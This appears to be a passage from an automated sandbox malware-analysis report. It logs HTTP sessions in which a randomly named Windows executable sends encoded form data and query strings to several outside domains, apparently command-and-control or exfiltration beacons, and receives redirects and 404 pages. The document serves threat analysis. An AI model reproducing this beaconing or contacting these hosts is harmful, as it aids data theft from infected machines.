                                      Data Ascii: H2y4Q2Q8=uqtM/fo4NBsCGSVTBKCBTEi3eLmemRvli01coQ9N/n1ZtIQtSaENGmQznhHNAiqwmTIK/6iORshOIwgoiGoFSWOV3c751s/kKDkH1tekp/x2ME9nQhvU5lPlXBolObDkHTWVK1JEPpmgfhPKqOyVW+Ru92N17/kedrf11Y+atptgj4OMs8+suL6BqNn4oLhX86HD0v2Uoqz2IbQY2ce/VNZBAdtLhkbr9gFrLSGGwkO2VNslqnJZeCaSJhs71TAJGEd37PiG/9Ri0rBhtZefsnmhyZiwxkxLrfAcE2ZUgfDDeimjyyfyCwS1JYEE6wdAHRG46b3dsK6rwRz/sDv41cgNUFtYx9pnYzVOcGrz7jOWFS5Ak2FomSzralSSKOXUoHpyvyzkqC6hdp1ykUy4y41kUt1GBkQ/OPdMPI6cvcmuOeMgk4MkumMQvqtO4WDtzm3CScAyqVqKIBN7GbTCrJ1xsDOXqbFsRggtFueH6mIxLuDNyt/ABKg9lCHJCxSE2WIaGyMLqWJTteldLpgGvZj0KyVbKM68gvhpIF/jlyzshiE/t5+ZmjI/C348GfO+ouq1zz+D5VkCHDKtMvvt7QbPeKFYoFsRT8oXgLKDlmzAQC2fHD/iIFxbuq93BqNpINJ0ZT8I/m41GMJtWz0Zcg4KOEIi6KQtCG9J04pqkvGaxklQqCxWubDW3iqyqQmALX5GwQ8GixEgmz5l4LowJwYwxB/hXJn1cZlFTgOL3OxVWeicUT1ghFu/ifEBDI9pWc+FRMHE0ZieVV2EG88ieSZD9RfsTF1PpoBX6VXnnY6q5WSaAxDyr1ws7R7kJi8cjaa8IbKyT7xk0Pujo2M709QiBpR7EuZ1JDrqrib4fjxhUmpEnDlkJ5B+UA6ct94Nm8q4QZD/5LvTgnz7BteMo+TvffMkbMZpfFar8xeV7JccDDABAPS04sT0CrJJVIrENl+ckNeY5zeH+PXxG4uIXwGbb3InfooOAVSGX+DIAZq [TRUNCATED]


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      8192.168.2.12497263.33.130.190804544C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 22, 2024 17:36:37.342082977 CEST562OUTGET /2n2j/?H2y4Q2Q8=joFs8vB6GTglbhp7B9ScZSy2L461ph/vq3RLpj4QvQQ4ra1TX7UyKU9MnTuOCnS10i5K+tOQN6x6Jww8jSAgdDHT6tnC+5q3FmMH6tu6qP4vAW8RETmJ+Sw=&Bz=dVmT HTTP/1.1
                                      Host: www.aposentandolegal.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Language: en-US,en;q=0.9
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
                                      Sep 22, 2024 17:36:38.486999989 CEST392INHTTP/1.1 200 OK
                                      Server: openresty
                                      Date: Sun, 22 Sep 2024 15:36:37 GMT
                                      Content-Type: text/html
                                      Content-Length: 252
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 48 32 79 34 51 32 51 38 3d 6a 6f 46 73 38 76 42 36 47 54 67 6c 62 68 70 37 42 39 53 63 5a 53 79 32 4c 34 36 31 70 68 2f 76 71 33 52 4c 70 6a 34 51 76 51 51 34 72 61 31 54 58 37 55 79 4b 55 39 4d 6e 54 75 4f 43 6e 53 31 30 69 35 4b 2b 74 4f 51 4e 36 78 36 4a 77 77 38 6a 53 41 67 64 44 48 54 36 74 6e 43 2b 35 71 33 46 6d 4d 48 36 74 75 36 71 50 34 76 41 57 38 52 45 54 6d 4a 2b 53 77 3d 26 42 7a 3d 64 56 6d 54 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?H2y4Q2Q8=joFs8vB6GTglbhp7B9ScZSy2L461ph/vq3RLpj4QvQQ4ra1TX7UyKU9MnTuOCnS10i5K+tOQN6x6Jww8jSAgdDHT6tnC+5q3FmMH6tu6qP4vAW8RETmJ+Sw=&Bz=dVmT"}</script></head></html>
                                      Sep 22, 2024 17:36:38.487067938 CEST392INHTTP/1.1 200 OK
                                      Server: openresty
                                      Date: Sun, 22 Sep 2024 15:36:37 GMT
                                      Content-Type: text/html
                                      Content-Length: 252
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 48 32 79 34 51 32 51 38 3d 6a 6f 46 73 38 76 42 36 47 54 67 6c 62 68 70 37 42 39 53 63 5a 53 79 32 4c 34 36 31 70 68 2f 76 71 33 52 4c 70 6a 34 51 76 51 51 34 72 61 31 54 58 37 55 79 4b 55 39 4d 6e 54 75 4f 43 6e 53 31 30 69 35 4b 2b 74 4f 51 4e 36 78 36 4a 77 77 38 6a 53 41 67 64 44 48 54 36 74 6e 43 2b 35 71 33 46 6d 4d 48 36 74 75 36 71 50 34 76 41 57 38 52 45 54 6d 4a 2b 53 77 3d 26 42 7a 3d 64 56 6d 54 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?H2y4Q2Q8=joFs8vB6GTglbhp7B9ScZSy2L461ph/vq3RLpj4QvQQ4ra1TX7UyKU9MnTuOCnS10i5K+tOQN6x6Jww8jSAgdDHT6tnC+5q3FmMH6tu6qP4vAW8RETmJ+Sw=&Bz=dVmT"}</script></head></html>
                                      Sep 22, 2024 17:36:38.487268925 CEST392INHTTP/1.1 200 OK
                                      Server: openresty
                                      Date: Sun, 22 Sep 2024 15:36:37 GMT
                                      Content-Type: text/html
                                      Content-Length: 252
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 48 32 79 34 51 32 51 38 3d 6a 6f 46 73 38 76 42 36 47 54 67 6c 62 68 70 37 42 39 53 63 5a 53 79 32 4c 34 36 31 70 68 2f 76 71 33 52 4c 70 6a 34 51 76 51 51 34 72 61 31 54 58 37 55 79 4b 55 39 4d 6e 54 75 4f 43 6e 53 31 30 69 35 4b 2b 74 4f 51 4e 36 78 36 4a 77 77 38 6a 53 41 67 64 44 48 54 36 74 6e 43 2b 35 71 33 46 6d 4d 48 36 74 75 36 71 50 34 76 41 57 38 52 45 54 6d 4a 2b 53 77 3d 26 42 7a 3d 64 56 6d 54 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?H2y4Q2Q8=joFs8vB6GTglbhp7B9ScZSy2L461ph/vq3RLpj4QvQQ4ra1TX7UyKU9MnTuOCnS10i5K+tOQN6x6Jww8jSAgdDHT6tnC+5q3FmMH6tu6qP4vAW8RETmJ+Sw=&Bz=dVmT"}</script></head></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      9192.168.2.1249727194.85.61.76804544C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 22, 2024 17:36:43.750760078 CEST829OUTPOST /4kww/ HTTP/1.1
                                      Host: www.vpnboo.online
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.vpnboo.online
                                      Referer: http://www.vpnboo.online/4kww/
                                      Cache-Control: no-cache
                                      Content-Length: 205
                                      Connection: close
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
                                      Data Raw: 48 32 79 34 51 32 51 38 3d 39 41 7a 56 2b 64 2f 6c 53 37 53 79 46 39 62 79 68 71 34 6a 4d 50 51 48 4b 53 7a 33 77 59 4c 45 6b 37 61 6c 4f 62 6a 74 76 38 58 51 70 45 52 4f 32 31 4d 41 58 6e 66 79 68 62 4a 51 4a 6d 6f 2f 6b 4f 7a 44 63 68 4b 67 30 45 36 32 69 35 51 30 6f 66 35 62 51 66 37 78 6b 6e 48 59 49 2f 6e 32 61 55 47 56 4b 71 2b 2f 70 76 6b 45 47 2f 64 73 56 4d 68 4f 59 63 6c 39 68 2f 4c 2b 78 58 62 44 6b 48 73 2b 4c 79 61 44 53 75 31 45 51 34 4a 64 61 79 6d 2b 6a 71 61 2f 75 41 48 61 42 68 46 5a 61 31 53 30 2b 62 51 68 48 35 72 52 45 2b 51 34 6a 31 6c 61 65 56 48 69 70 6f 48 63 47 38 62 53 34 41 3d 3d
                                      Data Ascii: H2y4Q2Q8=9AzV+d/lS7SyF9byhq4jMPQHKSz3wYLEk7alObjtv8XQpERO21MAXnfyhbJQJmo/kOzDchKg0E62i5Q0of5bQf7xknHYI/n2aUGVKq+/pvkEG/dsVMhOYcl9h/L+xXbDkHs+LyaDSu1EQ4Jdaym+jqa/uAHaBhFZa1S0+bQhH5rRE+Q4j1laeVHipoHcG8bS4A==
                                      Sep 22, 2024 17:36:44.478441000 CEST691INHTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Sun, 22 Sep 2024 15:36:44 GMT
                                      Content-Type: text/html
                                      Content-Length: 548
                                      Connection: close
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      10192.168.2.1249728194.85.61.76804544C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 22, 2024 17:36:46.296861887 CEST849OUTPOST /4kww/ HTTP/1.1
                                      Host: www.vpnboo.online
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.vpnboo.online
                                      Referer: http://www.vpnboo.online/4kww/
                                      Cache-Control: no-cache
                                      Content-Length: 225
                                      Connection: close
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
                                      Data Raw: 48 32 79 34 51 32 51 38 3d 39 41 7a 56 2b 64 2f 6c 53 37 53 79 44 64 72 79 6a 4c 34 6a 62 66 52 31 48 43 7a 33 2f 34 4c 41 6b 37 57 6c 4f 61 32 79 75 4f 7a 51 6f 6d 4a 4f 33 32 55 41 55 6e 66 79 70 37 4a 56 4e 6d 6f 6f 6b 4f 50 68 63 6b 79 67 30 45 2b 32 69 34 67 30 6f 49 6c 59 43 2f 37 7a 78 33 48 57 57 50 6e 32 61 55 47 56 4b 71 43 56 70 73 55 45 47 50 74 73 53 59 31 4e 52 38 6b 50 78 76 4c 2b 6e 6e 62 48 6b 48 73 63 4c 7a 57 70 53 74 4e 45 51 35 5a 64 61 67 4f 39 6f 71 61 35 6a 67 47 36 45 51 38 4f 66 30 36 6a 30 35 77 37 45 59 69 39 42 34 42 69 38 48 74 4d 4c 57 54 76 6b 2f 2b 73 4c 2f 6d 62 6a 42 68 32 48 4b 6e 6b 63 36 31 72 36 65 41 54 32 6e 50 4d 78 30 34 3d
                                      Data Ascii: H2y4Q2Q8=9AzV+d/lS7SyDdryjL4jbfR1HCz3/4LAk7WlOa2yuOzQomJO32UAUnfyp7JVNmookOPhckyg0E+2i4g0oIlYC/7zx3HWWPn2aUGVKqCVpsUEGPtsSY1NR8kPxvL+nnbHkHscLzWpStNEQ5ZdagO9oqa5jgG6EQ8Of06j05w7EYi9B4Bi8HtMLWTvk/+sL/mbjBh2HKnkc61r6eAT2nPMx04=
                                      Sep 22, 2024 17:36:47.045016050 CEST691INHTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Sun, 22 Sep 2024 15:36:46 GMT
                                      Content-Type: text/html
                                      Content-Length: 548
                                      Connection: close
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      11192.168.2.1249729194.85.61.76804544C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 22, 2024 17:36:48.843801975 CEST1862OUTPOST /4kww/ HTTP/1.1
                                      Host: www.vpnboo.online
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.vpnboo.online
                                      Referer: http://www.vpnboo.online/4kww/
                                      Cache-Control: no-cache
                                      Content-Length: 1237
                                      Connection: close
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
                                      Data Raw: 48 32 79 34 51 32 51 38 3d 39 41 7a 56 2b 64 2f 6c 53 37 53 79 44 64 72 79 6a 4c 34 6a 62 66 52 31 48 43 7a 33 2f 34 4c 41 6b 37 57 6c 4f 61 32 79 75 4f 37 51 70 54 56 4f 32 58 55 41 56 6e 66 79 6a 62 4a 55 4e 6d 6f 70 6b 4f 58 6c 63 6c 4f 57 30 47 32 32 77 71 6f 30 35 73 52 59 62 50 37 7a 75 48 48 62 49 2f 6e 76 61 55 33 63 4b 72 2b 56 70 73 55 45 47 4e 46 73 45 63 68 4e 64 63 6c 39 68 2f 4c 36 78 58 62 72 6b 48 55 6d 4c 7a 53 54 53 63 74 45 52 59 70 64 62 56 53 39 68 71 61 37 6d 67 47 59 45 52 42 4a 66 30 32 5a 30 35 6f 46 45 59 61 39 42 4a 73 4e 72 6a 35 73 55 31 48 52 6f 2f 32 35 47 4f 32 5a 6c 79 68 55 43 62 2b 42 52 34 59 32 78 38 39 4b 7a 69 4c 6d 74 68 53 35 4b 2f 30 33 6f 39 45 39 67 55 76 30 64 58 7a 47 6e 57 74 77 36 6c 56 4b 4f 30 39 31 51 42 61 38 34 72 55 41 2b 61 38 62 57 6d 6e 57 57 79 33 47 66 53 78 58 64 71 37 47 63 45 59 53 6d 74 44 6a 6f 68 67 37 66 38 56 35 50 6a 47 58 79 36 53 4e 47 58 6a 43 6f 74 57 6a 53 36 34 50 62 63 63 6d 6e 79 74 70 65 44 56 4b 5a 4a 6c 71 66 62 51 56 79 [TRUNCATED]
                                      Data Ascii: H2y4Q2Q8=9AzV+d/lS7SyDdryjL4jbfR1HCz3/4LAk7WlOa2yuO7QpTVO2XUAVnfyjbJUNmopkOXlclOW0G22wqo05sRYbP7zuHHbI/nvaU3cKr+VpsUEGNFsEchNdcl9h/L6xXbrkHUmLzSTSctERYpdbVS9hqa7mgGYERBJf02Z05oFEYa9BJsNrj5sU1HRo/25GO2ZlyhUCb+BR4Y2x89KziLmthS5K/03o9E9gUv0dXzGnWtw6lVKO091QBa84rUA+a8bWmnWWy3GfSxXdq7GcEYSmtDjohg7f8V5PjGXy6SNGXjCotWjS64PbccmnytpeDVKZJlqfbQVyspLihsqA1s+O0yyz/ELpWraQCrsqGB32/d2ox0hp3f2T6O1YpCLInIjpjxZPiU9IrU7w+J4GlUfmwX7DDWYHB69SiWsSPg23bzK6GbRnKKipAVi338fCv962BX0+O8ITLfK+w1kObJX3zVKM6zu58LpAD226uEZGa7L7VoRy+54WoDwdEdU4beZoG1Cvfr2c/sJWGqIcuH14FaS255hRq+z7auB4mmWrcvbH0O7L/Tfq8CSzCM80BXFHNJ5nnv/t6KvObIjU7hszrtGS7SqECJQ33hgfsARiScr8Q1tiIWYz5WudqIZjLLn1udXNzuzoe5/9OOL0WguFJWnAUSX43SfOWEtkA8YTG88iuM4SzfUJX6LS/AGwjF9yKFGBVnHxXeIvg4triXA2N1eJYeC4rvKWbMuO/yaIXazlHyUIjL0Y4xdNhNIXCOs1ndtwmVaUBFdmUR00VW2L8E20LHcEMBB2NzvKbqzO9GNjaSfChaBNWEg7d5stlo9xUeKMfr0sSFmOodPyVkv11uik/rZyMU7UuWwtvbj1rKHQ9MXYuIXA/50RNJdBH5nd6MR/CAYTgHpT4PfTBI7ZCfr2LjGpCH/7Di784homQBGRfuFpeU/EfBcByT1GotBAO6HzfxuM1dNJrJc6HD5GS0RL3GaJlDA2TcChi6slyP [TRUNCATED]
                                      Sep 22, 2024 17:36:49.547349930 CEST691INHTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Sun, 22 Sep 2024 15:36:49 GMT
                                      Content-Type: text/html
                                      Content-Length: 548
                                      Connection: close
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      12192.168.2.1249730194.85.61.76804544C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 22, 2024 17:36:51.387424946 CEST555OUTGET /4kww/?H2y4Q2Q8=wCb19ovIO5yaf83ih/4WSZQzUgTiwtPQuomKA52vzoLzoGlIy2AAZn2TjJlMNmIf2OXgIRW9tXCTvrd658lOU5u0mQHiLMGqbxOZL/2HkpMEINgcF945eLE=&Bz=dVmT HTTP/1.1
                                      Host: www.vpnboo.online
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Language: en-US,en;q=0.9
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
                                      Sep 22, 2024 17:36:52.091631889 CEST691INHTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Sun, 22 Sep 2024 15:36:51 GMT
                                      Content-Type: text/html
                                      Content-Length: 548
                                      Connection: close
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      13192.168.2.1249731162.0.238.246804544C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 22, 2024 17:36:57.313114882 CEST826OUTPOST /hczh/ HTTP/1.1
                                      Host: www.quantis.life
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.quantis.life
                                      Referer: http://www.quantis.life/hczh/
                                      Cache-Control: no-cache
                                      Content-Length: 205
                                      Connection: close
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
